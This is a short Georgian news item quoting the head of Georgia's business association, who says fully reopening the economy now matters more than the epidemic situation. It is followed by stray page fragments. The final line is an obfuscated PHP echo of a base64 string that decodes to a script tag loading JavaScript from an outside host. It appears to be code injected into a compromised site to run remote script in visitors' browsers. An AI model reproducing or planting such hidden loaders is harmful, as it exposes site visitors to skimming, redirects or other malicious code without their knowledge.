celsiusi
ავერსი საქკაბელი
საქართველოს ბიზენსასოციაციის პრეზიდენტი სოსო ფხაკაძე მთავრობის ადმინისტრაციაში პრემიერთან შეხვედრამდე აცხადებს, რომ დღეს ეპიდემიოლოგიური ვითარება მეორე საკითხია და უმთავრესი ეკონომიკის და ბიზნესის სრულად გახსნაა.
 
მისი თქმით, საქართველოს ბიზნეს ასოციაცია  დღეს ეკონომიკის გახსნის შესახებ საკითხს დააყენებს და შეხვედრაზე ამ საკითხებს განიხილავენ.
 
„ჩვენ ვაპირებთ ეკონომიკის გახსნასთან დაკავშირებული საკითხების დაყენებას. ძალიან კარგი ნაბიჯებია ამ მხრივ გადადგმული, რაღაც მოსაზრებები გვაქვს და ამას აუცილებლად ვიტყვით შეხვედრაზე.
 
ახლა ყველაფერზე მნიშვნელოვანი ეკონომიკასა და ბიზნესზე კონცენტრირებაა. აქამდე ყოველთვის ვიძახდით, რომ ეპიდვითარებას ვაკვირდებოდით. ეს იყო ჩვენი აპრიორი, მაგრამ დღევანდელი მდგომარეობის გამო, ვფიქრობთ, ეკონომიკა მთლიანად უნდა გაიხსნას“, - განაცხადა სოსო ფხაკაძემ.
1505
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");